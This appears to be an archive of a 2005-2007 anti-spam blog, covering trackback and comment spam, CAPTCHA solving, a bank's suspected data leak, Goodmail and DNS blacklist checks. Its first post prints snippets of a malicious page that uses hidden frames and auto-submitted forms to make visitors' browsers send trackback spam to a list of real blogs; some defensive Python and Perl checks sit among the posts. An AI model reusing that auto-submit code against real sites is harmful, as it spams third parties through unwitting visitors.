
Spreading Comment and Trackback Spam Through Zombie Browsers

August 7, 2007 – 11:57 am

Since my move to Wordpress, I have been noticing a lot of funny trackback hits going back to my old Movable Type installation. First of all, all of these hits were coming from different IP addresses and different browsers. Second, they all had the same referrer. Something was fishy. On further examination, I found something really interesting.

It seems that the referrer is hosting a malicious HTML page. That page consists of a set of JavaScripts which load new frames and submit trackback pings to other blogs on the Internet. That means that anyone going to that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the referrer and end up on the malicious page, which then submits more trackback spam in the background. The trackbacks themselves lead to fake blogs and search results, which eventually lead either to drug stores or to ad-populated pages.

There are several interesting things here. First, the malicious page kind of propagates itself. Second, the page does not use any kind of security exploit; everything is done through regular JavaScript. Third, there is apparently enough interest in referrers that it generates enough traffic to affect other sites. All of this is very similar to the way regular spam and viruses are spread, through zombie computers, except in this case the browsers are the zombies.

Below are some snippets from the code of this site (you can view the decoded site source here - courtesy of Stephane “Gooby” Theroux’s decoder):

First the site loads an array with the target trackback URLs:

var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');

The next step is to create the frames and forms inside:


var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();

The third step is to fill in the forms and submit:


function tbsp()
{
    var d = parent.fr1.document;
    // Note which target is being hit (inside the hidden div, so nothing is visible)
    d.getElementById('tbdescr').innerHTML = ii + ': ' + unescape(ss[ii]);
    // Point the hidden form at the next trackback URL from the array
    d.fff.action = unescape(ss[ii]);
    d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
    d.fff.title.value = unescape('Diphtheria');
    d.fff.excerpt.value = 'Read more about ' + unescape('Diphtheria');
    d.fff.blogname.value = unescape('Diphtheria');
    // Submit into the second frame; no user interaction is needed
    d.fff.submit();
    ...

Fourth step - rinse, repeat:


    if (ii > 0) {
        ii--;
        setTimeout('tbsp()', 10000);
    } else {
        setTimeout('refresh()', 2000);
    }

The reason this is allowed to happen is that the browser does not restrict a page's interaction with its child frames. Thus, dynamically created frames with malicious form submits can fire without user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of web service or web application that accepts GET or POST. In fact it would probably be trivial, although most social networks and web applications should filter out JavaScript.

At the current time there is no protection against this type of attack other than disabling JavaScript or having the browser warn you before submitting a form.
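The receiving side can still apply some sanity checks to pings like the ones above. The following is an added example, not code from the original post or from Movable Type or WordPress: it rejects source URLs that are not http(s), rejects pings whose HTTP Referer names a different host than the claimed source (every hit described above carried the spammer's page as referrer, while the url field pointed elsewhere), and verifies that the claimed source page actually links back to the post being pinged. The function name, the example.* hosts and the sample pages are assumptions; the fetcher is injected so the check runs offline against constructed pages.

```python
# Added example, not code from the original post or from any blog platform:
# a server-side sanity check for an incoming trackback ping.  Names such as
# validate_trackback, SAMPLE_PAGES and the example.* hosts are assumptions.
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collects the href targets of <a> tags in an HTML document."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def validate_trackback(ping, permalink, referer, fetch):
    """Return (accepted, reason) for one trackback ping.

    ping      -- dict of the POST fields (url, title, excerpt, blogname)
    permalink -- URL of the post that was pinged
    referer   -- value of the HTTP Referer header on the ping, or None
    fetch     -- callable(url) -> HTML of the claimed source page; injected
                 so the check can run offline against constructed pages
    """
    src = ping.get("url", "")
    parsed = urlparse(src)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False, "source url is not an http(s) URL"

    # A ping submitted by a form on the spammer's page arrives with that page
    # as the Referer, while the url field names some other site.  Pings sent
    # by blog software normally carry no Referer at all.
    if referer:
        ref_host = urlparse(referer).hostname
        if ref_host and ref_host != parsed.hostname:
            return False, "Referer host %s differs from source host %s" % (
                ref_host, parsed.hostname)

    # Link-back check: a page that claims to discuss our post must link to it.
    try:
        html = fetch(src)
    except Exception as exc:  # network error, timeout, 404, ...
        return False, "could not fetch source page: %s" % exc
    collector = _LinkCollector()
    collector.feed(html)
    if permalink not in collector.links:
        return False, "source page does not link to %s" % permalink
    return True, "ok"


# Constructed sample data so the example runs offline.
PERMALINK = "http://blog.example.org/2007/08/zombie-browsers"
SAMPLE_PAGES = {
    "http://genuine.example.net/reply": (
        '<p>Interesting analysis <a href="%s">here</a>.</p>' % PERMALINK),
    "http://spam.example.com/": "<html><body>cheap pills</body></html>",
}


def sample_fetch(url):
    """Stand-in for an HTTP GET; only knows the constructed pages above."""
    if url not in SAMPLE_PAGES:
        raise IOError("unreachable: %s" % url)
    return SAMPLE_PAGES[url]


if __name__ == "__main__":
    genuine = {"url": "http://genuine.example.net/reply", "title": "Reply"}
    zombie = {"url": "http://spam.example.com/", "title": "Diphtheria"}
    print(validate_trackback(genuine, PERMALINK, None, sample_fetch))
    print(validate_trackback(zombie, PERMALINK,
                             "http://zombie.example.com/index.html", sample_fetch))
    print(validate_trackback(zombie, PERMALINK, None, sample_fetch))
```

The link-back fetch is the expensive part and should be done with a short timeout and a size limit in production; the Referer comparison is cheap and catches exactly the browser-driven submissions described in this post, but it must tolerate an absent header, since legitimate blog software sends none.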

Comments are welcome at blog /at/ shaftek [dot] org.

Why Paying People to Crack CAPTCHAs Might Be Good

January 23, 2007 – 10:03 pm

Almost four years ago I posted about a spammer that was using a free porn site as a way to get people to solve CAPTCHAs (those annoying images that ask you to type in stuff). Two Slashdot stories from a few months back discuss how spammers might be hiring people in developing countries to solve them. The going rate seems to be about $0.60/hour.

Now unlike most, I think this may turn out to be a good thing. Why? Because it imposes some cost on the spammers. Unfortunately, the cost isn’t high enough, but nevertheless it is something. However, in some ways it is similar to e-postage, which, as my colleague John R. Levine addressed, does not solve spam. Instead, what may be the final solution to spam is increased cooperation among ISPs, along the lines of what Carl Hutzler wrote a while back.

Security Breach at EmigrantDirect

December 6, 2006 – 3:06 pm

I had a high interest savings account with EmigrantDirect for about 1 1/2 years. Around July of this year (2006), Emigrant switched their providers for online banking, resulting in a new interface for their website. Shortly after that switch, I began to get spam messages on an email address that had only ever been used for EmigrantDirect before the switch. I contacted their old provider, MetaVante, who did a search of their systems and did not find any incidents. HOWEVER, when I contacted Emigrant, they confirmed the problem, as you can see from the email reply below:

Thank you for contacting EmigrantDirect. Kindly accept our apologies for any inconvenience these unsolicited emails may have caused you. We are aware of the situation and are currently investigating the matter. Please forward us a copy of those e-mails you are receiving to customerservice@emigrantdirect.com and we will escalate this matter to our security department for a proper investigation.

This means that somehow their customer information (including my account) was stolen sometime before the switch to their new system happened in July (maybe that’s why they switched?). Now the interesting question: Emigrant is based in NY state, which has a mandatory reporting law, as seen in this form. I asked Emigrant whether they plan on doing so and got the following reply:

Thank you for contacting us. We have forwarded your email to our Legal Department.

Given that aside from my email address, other sensitive information such as my social security number may have been stolen, I closed my account with them and moved over to HSBC. UNTIL THEY ARE MORE FORTHCOMING ON THE ISSUE, I RECOMMEND THAT EVERYONE SWITCHES AWAY FROM THEM AS WELL. You never know what information they lost.

On a closing note, I am not the only one having this issue. Here are links to some of the other people who have seen this behavior as well:
o Motley Fool’s forums - 1, 2, and 3
o Comments at FiveCentNickel - see #2
o Ars Technica forums - here
o A post on BankDeals - here and comments here
o Comments on SlickDeals - here

This type of thing has happened before with AmeriTrade.

P.P.S. Spam samples available upon request.

NY Times Article on Goodmail and AOL

February 4, 2006 – 8:14 pm

Dave Winer points to a NY Times story on the use of Goodmail by AOL, which I pointed out earlier. Apparently, Yahoo is in on the act as well.

AOL to Charge Senders for Some Emails?

February 2, 2006 – 5:40 pm

A recent post on Circle-ID by Matt Blumberg states that AOL is planning to charge some commercial senders for specific types of emails. A related story makes things a bit clearer:

In a bid to protect its members from e-mail fraud and phishing, and to offer consistency to commercial e-mail senders, AOL today will begin implementing Goodmail’s cryptographic CertifiedEmail program and phasing out its IP-based Enhanced Whitelist.

As part of its e-mail security practices, AOL blocks the display of images and hyperlinks on most high-volume messages, except if senders are on the AOL Enhanced whitelist and maintain very low complaint rates. Beginning today, AOL will also allow senders who have undergone accreditation through Goodmail to display images and hyperlinks by default. Goodmail charges accredited companies a fraction of a cent per message sent.

In addition, AOL will add a “trust symbol” to messages sent by Goodmail’s CertifiedEmail senders. It will appear in the inbox and the message window, so members will understand that a sender’s identity and reputation have been verified.

There are three important points here:
1. This fee is only charged for specific types of emails (“enhanced whitelist”) - with links and images. All other emails can be sent plain text.
2. A trust symbol will be used by AOL.
3. A cryptographic token is used for signing email similar to DKIM.

Leaving aside the business aspects, what is interesting about this is that AOL is basically providing the community with a test case of how three different things would work: e-postage, trust symbols (like browser padlocks) and cryptographic tokens. All of this of course will be very interesting to watch, especially the spammers’ reactions to it.

UPDATE: Suresh states in the comments at Circle-ID that the entire story might be wrong and AOL is not shutting down its enhanced whitelist. ALSO, it seems that the person who wrote the Circle-ID article is in fact a CEO of a competitor to GoodMail.

SpamAssassin and My Spam Volume

November 1, 2005 – 9:14 pm

For quite some time I have been using the SpamAssassin installation provided by our provider to tag my business email account. However, only a few days ago did I actually set it to delete all emails that score over 10.0 server-side. Surprisingly enough, my spam volume has dropped to almost a trickle since then. I specifically used such a high score (which SA recommends for ISP environments). Additionally, I had reviewed all of my incoming spam over the past year or so to see if SA was wrong.

Good work, Justin!

UPDATE: So far, after almost a month of running it this way, I have seen no ill side effects.

Upgrading to MT v3.17

July 14, 2005 – 2:54 pm

After getting hit with several spam floods over the past few weeks, I am upgrading to v3.17 of MovableType. Please be patient as there might be occasional hiccups.

UPDATE: Upgrade has been successful.

Final “-01” Feedback Reporting Draft

May 13, 2005 – 4:50 pm

The final draft (-01) is here (HTML and TXT). Diffs are also available (HTML and TXT). As always, comments are welcome either to the mailing list or to me.

One of these days I am going to get around to writing a more complete background of this draft and the process around it.

Follow Up on the Abuse Report Draft

May 5, 2005 – 1:34 am

Since the initial draft two and a half weeks ago, a lot of things have taken place. First of all, Dave was nice enough to open up a public mailing list for anyone who wants to comment on the draft. I will be putting information from it into the -01 draft, which is currently in the works. Second, there is now a small public page called “ARF” or “Abuse Reporting Format” which will hopefully contain all the info on this in one easy to find place. Third, I am working on the next (-01) draft, which will hopefully explain things better than the current one and put in place a normal extensibility mechanism (an IANA registry similar to what the SIP folks have).

There is also a lot of activity behind the scenes but I am not at liberty (yet) to disclose it. Needless to say I am very happy and excited that things are moving along.

New Focus for Blog Spam: Spreading Spyware

March 15, 2005 – 1:28 pm

Historically, blog spam has been used to raise search engine rankings. However, with the recent introduction of the “nofollow” directive this avenue of profit has been essentially killed off. So now comment spammers are moving over to a new area of profit: spyware (phishing and other similar stuff will probably follow). While there have been reports of spyware in Google’s Blogger service, triggered by the “next blog” feature, I haven’t yet seen reports of trackback or comment spam doing the same. Well, until now.

The original spam comment to my blog came from some IP address in Ukraine, most likely a hijacked machine. It pointed to a site hosted on a free provider under the URL “http://www.freewebs.com/baby-names/” (DO NOT GO THERE UNLESS YOU ARE SECURE). After getting the page source with wget, I was surprised to see that it’s mainly empty. It consisted of a JavaScript include at the beginning, a set of font size “2” HR tags in the middle which are basically invisible to normal users, and a stats tracker at the end. The page is still up at the time of writing but I reported it to the ISP so it’s probably going to be taken down soon. You can download a ZIP file containing all of the files described in this post right over here.

Now what value does an empty page serve? After looking at the JavaScript include located at the beginning of the file, it seems a lot. The JavaScript file comes from a site called “ysbweb.com” which is owned by “Interactive Search Technologies” or IST. They market a search toolbar which seems to be spyware. NOW, keep in mind that this JavaScript file DOES NOT come from the “free” page that was originally referred to via the trackback. Rather it is a file provided by the spyware vendor themselves, and therefore all of the bad stuff that it does is directly caused by them, not by some hacker.
Read the rest of this entry »

Turning Comments On

February 17, 2005 – 2:13 am

While going through some old posts tonight I started wondering why many of them have comments turned off. After some time I remembered that I had installed the MT-CloseComments plugin. I have shut that plugin off so I can have comments again, and hopefully some of the anti-spam techniques that I have been trying out will work.

Domainkeys and GPL

February 15, 2005 – 12:33 pm

Andy mentions a rather interesting list message from Sam Varshavchik, the author of Courier (an open source MTA licensed under the GPL):

> I was wondering if (Yahoo’s) Domainkeys is considered to be implemented in Courier.

No. Yahoo has patent claims on Domainkeys, which are not licensed under GPL-compatible terms.

For the curious, the IPR terms for DomainKeys can be found here. The actual DK license is here. To me it is unclear what exactly the problem is but of course IANAL.

UPDATE: It seems that section 3.4 is one of the culprits being similar to the advertising clause in the original BSD license (see FSF writeup).

Distributed xLists for Blogs

February 11, 2005 – 4:41 pm

Following up on my earlier post about the use of email blacklists for blogs and Andy’s comments, Andy and I started thinking about how to improve blacklists and whitelists for blogs. What we came up with is “Distributed xLists” - in black, white and shades of gray. Instead of following a centralized model, we chose a distributed peer to peer model that allows folks to publish, combine and redistribute blacklist/whitelist information while attaching their own opinion to it as well. Additionally, instead of plain white and black colors, our lists have weights allowing all kinds of shady stuff :) We hope that the trust in place between individuals combined with the flexibility of weighted opinions would fare better than the existing stuff.

For full details, you can read the HTML version of our Internet draft at Andy’s site (which should post soon to the IETF’s repository) and Andy’s comments. Now I just have to get around to updating my MT plugin.

Why Bad is Good in Spam

February 2, 2005 – 10:22 pm

While perusing the news, I came across a rather interestingly titled article at CNET: “Zombie trick expected to send spam sky-high”. Like many other spam-related stories, this one had an apocalyptic feel to it as well:

According to the SpamHaus Project–a U.K.-based antispam compiler of blacklists that block 8 billion messages a day–a new piece of malicious software has been created that takes over a PC. This “zombie” computer is then used to send spam via the mail server of that PC’s Internet service provider. This means the junk mail appears to come from the ISP, making it very hard for an antispam blacklist to block it. Previously, zombie PCs have been used as mail servers themselves, sending spam e-mails directly to recipients.

This will cause serious problems for the e-mail infrastructure, as it is impractical to block mail with domain names from large ISPs. Linford predicts that ISPs will see a growth in the volume of bulk mail they send and receive over the next two months, with spam levels rising from 75 percent of all e-mail to around 95 percent within a year.

“The e-mail infrastructure is beginning to fail,” Linford warned. “You’ll see huge delays in e-mail and servers collapsing. It’s the beginning of the e-mail meltdown.”

Oh no, the email infrastructure “is beginning to fail”, it’s a “meltdown”! Man the deck, close the hatches, the spammers are coming! Seriously, this has probably been said a thousand times and email is still standing. Quite the contrary, this development is not the beginning of a spam meltdown but rather the beginning of the end for the spam plague in general. Why do I think so? Let’s sit down, analyze the facts and think for ourselves.
Read the rest of this entry »

An MT Plugin for Banned IP Lists

February 1, 2005 – 7:51 pm

Andy’s post got me thinking about publishing individual blacklists (something that Jay Allen of MT-BlackList has given up on). So, I put together a simple plugin for MovableType called “MT-Banned-List” that adds tags for generating a list of banned IP addresses. You can download version 0.1 here (just stick the .pl file into your plugins directory, and use one of the sample templates). Documentation is inside the plugin itself. You can see my own ban list in RSS 2.0 or plain text format.

Hopefully we can leverage individual blacklists in a distributed fashion for dealing with spam. This is just a first step.

UPDATE: See version 0.2.

Fighting Trackback Spam with Email Blacklists

February 1, 2005 – 1:04 pm

(For MT-Banned-List plugin for publishing the internal MT IP ban list, please see this post)

Overnight I got slammed by two trackback spam attacks on my blog, both lasting about two hours and originating from over 20 IPs. I added all of them to my banned list to prevent further occurrences. HOWEVER, I also sat down and analyzed the data to see if it correlates with email spam. Logically speaking it is highly unlikely that comment spammers have so many machines, so the most logical conclusion is that they are either using open proxies or infected residential machines. Incidentally the same type of machines are also used for email spam, so it is logical to assume that the data will cross-match.

WARNING: The amount of data that I collected is probably not statistically sufficient to draw conclusions.

To get my results, I collated a list of IPs used in the first attack, did a reverse DNS check on them and looked them up in SenderBase. Out of 28 IPs, only 13 had rDNS entries (46%), out of which about 8 looked like straight broadband or dialup (28%). The IPs were located all over the world, including universities, companies, and regular users, leading me further to believe that these were hijacked machines.

The most interesting data came from SenderBase: 17 IPs (60%) were listed in at least one spam blacklist as follows:

DSBL open proxy - 8 (28%)
CBL open proxy - 10 (35%)
SORBS open proxy - 4 (14%)
Blitzed open proxy - 4 (14%)
SpamCop spam - 5 (17%)
SORBS spam - 1 (3%)

Out of the remaining 11 IPs, 4 (14%) had their mail volume spike in the past 30 days, with some spiking as high as over 1500% in the past day. All together, only 7 (25%) were neither listed in any blacklist nor had volume spikes.

What this means is that we can successfully use email spam blacklists for blocking comment and trackback spam, especially the ones that check for open proxies, NOT spam. For example, using the four blacklists that detect open proxies (CBL, DSBL, SORBS and Blitzed) would have taken care of 16 IPs (57%) of the trackback spam I got. Unfortunately, the current plugins (MT-DSBL and WP-DSBL) only check against one list, DSBL, which in my case catches only 28% of the spam. Of course, adding URL blacklists such as SURBL makes this stuff work even better.

UPDATE #1: For MT 2.6 there is currently no way to check blacklists since Brad’s MT-DSBL plugin is only for MT v3. For MT v2.6, do the following:
1. In your blog directory, go to lib/MT/App/.
2. Open “Trackback.pm” in a text editor (backup first!).
3. Find a line starting “## Check if user has pinged recently”.
4. Insert the following right above that line:

## Check blacklists
my $rem_ip = $app->remote_ip;
my ($a, $b, $c, $d) = split(/\./, $rem_ip);
## DNSBLs expect the octets in reverse order
my $rev = "$d.$c.$b.$a";
## DSBL list
my $lookup = "$rev.list.dsbl.org";
## A listed address resolves (to an A record); an unlisted one gets NXDOMAIN
if (gethostbyname($lookup)) {
    return $app->_response(Error =>
        $app->translate("Your IP is blacklisted by DSBL, $lookup see http://dsbl.org/listing?$rem_ip."));
}

You can easily change it for any other blacklist as well.
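Since the post's own numbers show that a single list catches far less than the open-proxy lists combined, the natural extension is to query several zones and decide on the number of hits. Below is an added example, not code from the original post or from Movable Type, that generalizes the Perl snippet to a list of zones. The zone names are assumptions for illustration (list.dsbl.org appears in the post, but DSBL has since shut down, so replace the list with zones you actually trust), and the resolver is injectable so the sample runs offline against constructed listing data.

```python
# Added example, not code from the original post or from Movable Type: the
# single DSBL lookup generalized to several DNS blacklists at once.  Zone
# names are illustrative assumptions; the resolver is injectable so the
# example runs without network access.
import socket

# Replace with the lists you trust; DSBL, named in the post, no longer operates.
DNSBL_ZONES = [
    "list.dsbl.org",
    "cbl.abuseat.org",
    "dnsbl.sorbs.net",
    "opm.blitzed.org",
]


def reverse_ip(ip):
    """Turn 1.2.3.4 into 4.3.2.1, the label order DNSBL zones expect (IPv4)."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError("not a dotted-quad IPv4 address: %r" % ip)
    return ".".join(reversed(octets))


def dns_resolver(name):
    """True if name has an A record (listed), False on NXDOMAIN (not listed)."""
    try:
        socket.gethostbyname(name)
        return True
    except socket.gaierror:
        return False


def check_dnsbls(ip, zones=DNSBL_ZONES, resolver=dns_resolver):
    """Return the zones that list ip; an empty list means no hits."""
    rev = reverse_ip(ip)
    return [zone for zone in zones if resolver("%s.%s" % (rev, zone))]


def should_reject(ip, min_hits=1, **kwargs):
    """Policy wrapper: reject once at least min_hits zones list the address.

    Raising min_hits above 1 trades some coverage for fewer false positives
    from any one list that is poorly maintained.
    """
    hits = check_dnsbls(ip, **kwargs)
    return len(hits) >= min_hits, hits


# Constructed listing data so the example runs without network access:
# 1.2.3.4 is "listed" by two zones, everything else is clean.
SAMPLE_LISTINGS = {
    "4.3.2.1.cbl.abuseat.org",
    "4.3.2.1.opm.blitzed.org",
}


def sample_resolver(name):
    """Stand-in for DNS: a name is listed if it is in SAMPLE_LISTINGS."""
    return name in SAMPLE_LISTINGS


if __name__ == "__main__":
    for addr in ("1.2.3.4", "5.6.7.8"):
        print(addr, should_reject(addr, resolver=sample_resolver))
```

In a trackback handler the call would be should_reject(remote_ip) with the real resolver, with the hit list included in the rejection message the way the Perl version names DSBL. Each zone is a separate DNS query, so a long zone list adds latency to every ping; caching results per address for a short period keeps that manageable.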

UPDATE #2: As per Andy Newton’s comment, keep in mind that blacklists for email have not been all that good so caution is advised (also see this draft).


In any case, here is my raw data:
Read the rest of this entry »

Stopping Spam by Being Accountable

January 12, 2005 – 1:01 pm

John Levine just posted an excellent article from Carl Hutzler of AOL about how the real solution to spam is accountability and action by ISPs on their own outbound traffic. Excellent read.